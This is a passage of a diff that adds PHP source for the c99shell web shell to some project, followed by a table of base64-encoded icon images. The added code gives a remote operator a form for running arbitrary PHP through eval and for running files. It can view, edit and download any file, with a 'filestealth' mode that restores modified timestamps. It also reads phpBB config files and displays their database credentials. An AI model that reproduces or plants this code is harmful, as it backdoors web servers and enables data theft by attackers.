","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img 
src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ if ($k > count($head)) {$k = count($head)-1;}
+ for($i=0;$i<count($head);$i++)
+ {
+ if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+ }
+ $prcs = array();
+ foreach ($stack as $line)
+ {
+ if (!empty($line))
+ {
+ echo "<tr>";
+ $line = explode("",$line);
+ $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+ $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+ $prcs[] = $line;
+ echo "</tr>";
+ }
+ }
+ }
+ $head[$k] = "<b>".$head[$k]."</b>".$y;
+ $v = $processes_sort[0];
+ usort($prcs,"tabsort");
+ if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+ $tab = array();
+ $tab[] = $head;
+ $tab = array_merge($tab,$prcs);
+ echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+ foreach($tab as $i=>$k)
+ {
+ echo "<tr>";
+ foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+ echo "</tr>";
+ }
+ echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+ echo "<b>Result of execution this PHP-code</b>:<br>";
+ $tmp = ob_get_contents();
+ $olddir = realpath(".");
+ @chdir($d);
+ if ($tmp)
+ {
+ ob_clean();
+ eval($eval);
+ $ret = ob_get_contents();
+ $ret = convert_cyr_string($ret,"d","w");
+ ob_clean();
+ echo $tmp;
+ if ($eval_txt)
+ {
+ $rows = count(explode("\r\n",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+ }
+ else {echo $ret."<br>";}
+ }
+ else
+ {
+ if ($eval_txt)
+ {
+ echo 
"<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+ }
+ else {echo $ret;}
+ }
+ @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+ if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+ else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+ $r = @file_get_contents($d.$f);
+ $ext = explode(".",$f);
+ $c = count($ext)-1;
+ $ext = $ext[$c];
+ $ext = strtolower($ext);
+ $rft = "";
+ foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+ if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+ if (empty($ft)) {$ft = $rft;}
+ $arr = array(
+ array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+ array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+ array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+ array("Code","code"),
+ array("Session","phpsess"),
+ array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+ array("SDB","sdb"),
+ array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+ array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+ array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+ array("<img 
src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+ array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+ );
+ echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+ foreach($arr as $t)
+ {
+ if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+ elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+ else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+ echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+ }
+ echo "<hr size=\"1\" noshade>";
+ if ($ft == "info")
+ {
+ echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+ if (!$win)
+ {
+ echo "<tr><td><b>Owner/Group</b></td><td> ";
+ $ow = posix_getpwuid(fileowner($d.$f));
+ $gr = posix_getgrgid(filegroup($d.$f));
+ echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+ }
+ echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+ $fi = fopen($d.$f,"rb");
+ if ($fi)
+ {
+ if 
($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a 
href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a 
href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+ else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+ echo "Parameters for manual connect:<br>";
+ $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+ foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ echo "</b><hr size=\"1\" noshade>";
+ }
+ }
+ echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+ if (!empty($white)) {@ob_clean();}
+ highlight_file($d.$f);
+ if (!empty($white)) {c99shexit();}
+ echo "</div>";
+ }
+ elseif ($ft == "download")
+ {
+ @ob_clean();
+ header("Content-type: application/octet-stream");
+ header("Content-length: ".filesize($d.$f));
+ header("Content-disposition: attachment; filename=\"".$f."\";");
+ echo $r;
+ exit;
+ }
+ elseif ($ft == "notepad")
+ {
+ @ob_clean();
+ header("Content-type: text/plain");
+ header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+ echo($r);
+ exit;
+ }
+ elseif ($ft == "img")
+ {
+ $inf = getimagesize($d.$f);
+ if (!$white)
+ {
+ if (empty($imgsize)) {$imgsize = 20;}
+ $width = $inf[0]/100*$imgsize;
+ $height = $inf[1]/100*$imgsize;
+ echo "<center><b>Size:</b>&nbsp;";
+ $sizes = array("100","50","20");
+ foreach ($sizes as $v)
+ {
+ echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+ if ($imgsize != $v ) {echo $v;}
+ else {echo "<u>".$v."</u>";}
+ echo "</a>&nbsp;&nbsp;&nbsp;";
+ }
+ echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" 
width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 